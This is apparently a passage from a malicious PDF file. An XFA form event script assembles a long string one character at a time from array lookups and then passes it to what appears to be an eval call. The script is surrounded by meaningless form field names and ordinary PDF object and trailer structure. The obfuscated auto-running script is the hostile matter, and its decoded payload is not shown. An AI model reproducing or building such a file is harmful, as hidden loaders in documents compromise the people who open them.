=s+b;c=b=d=a[48];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[67];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[25];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[32];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[14];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[54];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[42];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[14];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[25];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[54];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[14];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[54];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[42];s=s+b;c=b=d=a[72];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[42];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[14];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[37];s=s+b;c=b=d=a[25];s=s+b;c=b=d=a[15];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[63];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[54];s=s+b;c=b=d=a[37];s=s+b;c=b=d=a[51];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[54];s=s+b;c=b=d=a[54];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[63];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[54];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[63];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[63];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[63];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[27];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[54];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[51];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[37];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[66];s=s+b;c=b=d=a[63];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[36];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[12];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[36];s=s+b;c=b=d=a[63];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[26];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[29];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[29];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[62];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[38];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;e(e("&#115;"));
					</script>
					</event>
				<ui>	
					<imageEdit/>
				</ui>
			</field>
		</subform>
	</subform>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">

<xfa:data><vewfwe><google>eva</google>





</vewfwe>





</xfa:data>



</xfa:datasets>

</xdp:xdp>

endstream
endobj
18 0 obj
<</Rect [12.5 5.1 18.3 7.7] /Subtype/Widget /Ff 65536 /T (google[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (google) /P 1 0 R /F 4>>
endobj
19 0 obj
<</T (sdfvs[0]) /Kids [18 0 R] /Parent 20 0 R>>
endobj
20 0 obj
<</T (vewfwe[0]) /Kids [19 0 R]>>
endobj
23 0 obj
<</AcroForm 21 0 R /Pages 5 0 R /Type/Catalog>>
endobj
21 0 obj
<</DA (/Helv 0 Tf 0 g ) /Fields [20 0 R] /XFA 8 0 R>>
endobj
xref
0 24 
trailer
<</Size 22 /Root 23 0 R>>
startxref
17175
%%EOF
